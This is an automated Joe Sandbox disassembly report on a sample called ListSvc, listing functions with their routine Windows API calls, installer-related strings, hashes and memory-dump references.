Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: AddressErrorHandleLastModuleProc
String ID: @$GetLogicalProcessorInformation$kernel32.dll
API String ID: 4275029093-79381301
Opcode ID: d2b5bb259a4a67909b9857f382d53dc443368d34a06db9e148c60c099e14fc22
Instruction ID: fae384035c4cbf403bb6e842233c038de7d928fc1d1ef8a2a4529768a9174d83
Opcode Fuzzy Hash: d2b5bb259a4a67909b9857f382d53dc443368d34a06db9e148c60c099e14fc22
Instruction Fuzzy Hash: E4117570D05208AEEF10EBA5DA45A6EB7F4DB44704F1084BFE454B72C1DF7D8A548B29

Uniqueness

Uniqueness Score: -1.00%

Function 005CE26C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 005CE27D

Part of subcall function 004EE238: EnterCriticalSection.KERNEL32(?,00000000,004EE4A7,?,?), ref: 004EE280

SelectObject.GDI32(00000001,00000000), ref: 005CE29F
GetTextExtentPointW.GDI32(00000001,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,?), ref: 005CE2B3
GetTextMetricsW.GDI32(00000001,?,00000000,005CE2F8,?,00000000,?,0068D5D0,00000001), ref: 005CE2D5
ReleaseDC.USER32 ref: 005CE2F2

Strings

ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 005CE2AA

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: Text$CriticalEnterExtentMetricsObjectPointReleaseSectionSelect
String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
API String ID: 1334710084-222967699
Opcode ID: 325bd83ac94b98e0ccaeb91b867b8168358bc3f43770baf6a1d651e33ba30b3f
Instruction ID: 68d2e7468c57547273e36bf030651d7f5f3d68c5ac32077f2b8cb66f1dd3ef54
Opcode Fuzzy Hash: 325bd83ac94b98e0ccaeb91b867b8168358bc3f43770baf6a1d651e33ba30b3f
Instruction Fuzzy Hash: 8E01847AA14204BFE704DEE9CC42F9EB7ECEB49704F510469F604E7280D678AD008724

Uniqueness

Uniqueness Score: -1.00%

Function 006B8141, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 0060F6D8: GetCurrentProcess.KERNEL32(00000028), ref: 0060F6E8
Part of subcall function 0060F6D8: OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0060F6EE

SetForegroundWindow.USER32(?), ref: 006B817A

Strings

%hm, xrefs: 006B815B
(\m, xrefs: 006B8183, 006B8194
Not restarting Windows because Uninstall is being run from the debugger., xrefs: 006B81B1
bm, xrefs: 006B8147
Restarting Windows., xrefs: 006B8151

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: Process$CurrentForegroundOpenTokenWindow
String ID: %hm$(\m$Not restarting Windows because Uninstall is being run from the debugger.$Restarting Windows.$bm
API String ID: 3179053593-36556386
Opcode ID: b7594902ceb65011b7cd408ddb31800c32ac1c1d22a90f0235b323c67c5cc1dc
Instruction ID: d1bb377931262cf507ba46983c8bd46f5a1d5c2f393bef5d4bb5aec732555b7a
Opcode Fuzzy Hash: b7594902ceb65011b7cd408ddb31800c32ac1c1d22a90f0235b323c67c5cc1dc
Instruction Fuzzy Hash: 621130746042049FD700EB69DD86FE837EAAB49304F5540BAF401AB7A2CE79AC82C759

Uniqueness

Uniqueness Score: -1.00%

Function 00409E60, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?,0040707B), ref: 00409E99
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?), ref: 00409E9F
GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?), ref: 00409EBA
WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?), ref: 00409EC0

Strings

Runtime error at 00000000, xrefs: 00409E92, 00409ED7
Error, xrefs: 00409ED2

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: FileHandleWrite
String ID: Error$Runtime error at 00000000
API String ID: 3320372497-2970929446
Opcode ID: a4deac2aa97ac97823855fef04cac89a22f23a0563f87e50a6800a30aeefe081
Instruction ID: a01582976990e38fcf300ac2ca1e4f1bd102d55210953f65d1fcb3aa769fb624
Opcode Fuzzy Hash: a4deac2aa97ac97823855fef04cac89a22f23a0563f87e50a6800a30aeefe081
Instruction Fuzzy Hash: 52F04FA0A44780BAEB10B7A19C07F7B261AD741B28F10567FB214B91D3C6B85CC49AE9

Uniqueness

Uniqueness Score: -1.00%

Function 0043171C, Relevance: 9.1, APIs: 6, Instructions: 144COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 004317D1
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 004317ED
SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 00431826
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 004318A3
SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 004318BC
VariantCopy.OLEAUT32(?,?), ref: 004318F7

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: ArraySafe$BoundIndex$CopyCreateVariant
String ID:
API String ID: 351091851-0
Opcode ID: 040e7940f355aaa7652d1378d9b08393b08e43244b2170bcb39dc03bfc7fe70c
Instruction ID: ede279f2d9249a03c5eeb803d5e3445196a0ad83b08d93498a0369a0c14e8414
Opcode Fuzzy Hash: 040e7940f355aaa7652d1378d9b08393b08e43244b2170bcb39dc03bfc7fe70c
Instruction Fuzzy Hash: 41512D75A002299FCB62DB59CD81BD9B3FCAF0C304F4455EAE508E7212D634AF858F58

Uniqueness

Uniqueness Score: -1.00%

Function 006AE6F8, Relevance: 9.1, APIs: 6, Instructions: 66COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 006AE714
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,006B78BD,00000000,006B81F9), ref: 006AE743
GetWindowLongW.USER32(?,000000EC), ref: 006AE758
SetWindowLongW.USER32 ref: 006AE77F
ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 006AE798
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 006AE7B9

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: Window$Long$Show
String ID:
API String ID: 3609083571-0
Opcode ID: cbd293cfec67b64efc79bc9d205490811c8f395d7711b658bf93e82dc89e2f59
Instruction ID: c5f2d3f14be40374ea6ae40072baf741f42d7864aa45c80e1917733d0618a2ec
Opcode Fuzzy Hash: cbd293cfec67b64efc79bc9d205490811c8f395d7711b658bf93e82dc89e2f59
Instruction Fuzzy Hash: FC111C75745200AFD700EB68DD81FE237EAAB9E314F4541A5F6158F3E2CA65EC40DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00405A04, Relevance: 9.0, APIs: 7, Instructions: 298sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000,0040FBAD), ref: 00405ABB
Sleep.KERNEL32(0000000A,00000000,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000,0040FBAD), ref: 00405AD1
Sleep.KERNEL32(00000000,00000000,?,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000,0040FBAD), ref: 00405AFF
Sleep.KERNEL32(0000000A,00000000,00000000,?,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000,0040FBAD), ref: 00405B15

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: d5c76b6411e5b1297fee21c622a9732816c4700a6e5391fd7fe9993b0e9394e2
Instruction ID: 7a051e160dd760b70f5de690832b1da94a718f6c47d0b95a7d4eebd5f387ad29
Opcode Fuzzy Hash: d5c76b6411e5b1297fee21c622a9732816c4700a6e5391fd7fe9993b0e9394e2
Instruction Fuzzy Hash: BCC1F272601B118BDB15CF69E884B27BBA2EB85310F18827FD4599F3D5C7B4A841CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0060D3B4, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 105fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,0060D4F1), ref: 0060D4A1
CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,0060D4F1), ref: 0060D4B1

Strings

_iu, xrefs: 0060D443
.tmp, xrefs: 0060D455
Gtk, xrefs: 0060D412, 0060D41D

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: CloseCreateFileHandle
String ID: .tmp$Gtk$_iu
API String ID: 3498533004-1320520068
Opcode ID: 8f4bd8aeb1207aa4b07bf03847036b0a2b10865cd30baef83bcbefd08e77ff22
Instruction ID: 38fd5bd3aef28e796ac18a57f9f91bd27b67d48edde35eb58a18837c564f9665
Opcode Fuzzy Hash: 8f4bd8aeb1207aa4b07bf03847036b0a2b10865cd30baef83bcbefd08e77ff22
Instruction Fuzzy Hash: 73319030E80209ABDB14EBE4C842BDEBBB5AF54308F118169E904B73D1D738AE458B55

Uniqueness

Uniqueness Score: -1.00%

Function 006B8998, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 102COMMON

Download Yara Rule

APIs

Part of subcall function 005B8250: SetWindowTextW.USER32(?,00000000), ref: 005B8281

ShowWindow.USER32(?,00000005,00000000,006B8C4E,?,?,00000000), ref: 006B89DE

Part of subcall function 005C745C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005C746F

Part of subcall function 00424020: SetCurrentDirectoryW.KERNEL32(00000000,?,006B8A06,00000000,006B8C15,?,?,00000005,00000000,006B8C4E,?,?,00000000), ref: 0042402B

Part of subcall function 005C6FB0: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,005C7045,?,?,?,00000001,?,0061037E,00000000,006103E9), ref: 005C6FE5

Strings

.msg, xrefs: 006B8A44
IMsg, xrefs: 006B8AB2
.dat, xrefs: 006B8A25
Uninstall, xrefs: 006B89C4

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
String ID: .dat$.msg$IMsg$Uninstall
API String ID: 3312786188-1660910688
Opcode ID: 87cec6a378dec6b032675d7c559790f2158faaa0e8ad7578a241a316ddb9e1cc
Instruction ID: 43941ce92546cf1f75effb4615d96ab71b8b1f254b2d248514a95b56d5af6042
Opcode Fuzzy Hash: 87cec6a378dec6b032675d7c559790f2158faaa0e8ad7578a241a316ddb9e1cc
Instruction Fuzzy Hash: 65415CB0A002059FC700EFA4CD96E9EBBB6FB88304F51846AF400A7751DB75AE41DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 006153AC, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000B06,00000000,00000000), ref: 006153C6
SendMessageW.USER32(00000000,00000B00,00000000,00000000), ref: 00615463

Strings

Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 006153F2
hSa, xrefs: 00615415
Failed to create DebugClientWnd, xrefs: 0061542C

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: MessageSend
String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd$hSa
API String ID: 3850602802-2905362044
Opcode ID: 4e2498dae47c6d0870a5ab4103f59c6443b436741fa29bda88c5ce5a22a9ee1a
Instruction ID: bd2b79d17f40968884fe1c372ced24de8c60c917dea0cb25488337d16b2a65e4
Opcode Fuzzy Hash: 4e2498dae47c6d0870a5ab4103f59c6443b436741fa29bda88c5ce5a22a9ee1a
Instruction Fuzzy Hash: 391123B1A403129FE300EB28DC81FDABBD69F94304F08002AF5858B3D2D3749C84C766

Uniqueness

Uniqueness Score: -1.00%

Function 00624AA4, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

MsgWaitForMultipleObjects.USER32 ref: 00624AD6
GetExitCodeProcess.KERNEL32 ref: 00624AF9
CloseHandle.KERNEL32(?,00624B2C,00000001,00000000,000000FF,000004FF,00000000,00624B25), ref: 00624B1F

Strings

MsgWaitForMultipleObjects, xrefs: 00624AE5
GetExitCodeProcess, xrefs: 00624B02

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: CloseCodeExitHandleMultipleObjectsProcessWait
String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
API String ID: 2573145106-3235461205
Opcode ID: 361a62daa0bf1d295b617bedeb0d636d14927d9149230c5f986aec38bd004ab5
Instruction ID: b445045a4a45572890d55b61ba1fda7f57045845c9b5a3357f52015174d7dfc9
Opcode Fuzzy Hash: 361a62daa0bf1d295b617bedeb0d636d14927d9149230c5f986aec38bd004ab5
Instruction Fuzzy Hash: CE01A234640605AFD710EFA8ED62E9977EAEB49721F200265F520D73D0DE74ED44CA19

Uniqueness

Uniqueness Score: -1.00%

Function 004070B0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00000105,?), ref: 004070E7
SetCurrentDirectoryW.KERNEL32(?,00000105,?), ref: 004070ED
GetCurrentDirectoryW.KERNEL32(00000105,?), ref: 004070FC
SetCurrentDirectoryW.KERNEL32(?,00000105,?), ref: 0040710D

Strings

:, xrefs: 004070CC

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: aa9707b4d0d9c5d03511b22bbefae7383822b12ede650e628390a7387f8948e9
Instruction ID: 4e46778bef482c884a40b6a77bd37b1cdf5980326a29a022de95e28d89e8e0a5
Opcode Fuzzy Hash: aa9707b4d0d9c5d03511b22bbefae7383822b12ede650e628390a7387f8948e9
Instruction Fuzzy Hash: 71F0627154474465D310E7658852BDB729CDF84348F04843E76C89B2D1E6BC5948979B

Uniqueness

Uniqueness Score: -1.00%

Function 0059BDE0, Relevance: 7.6, APIs: 5, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
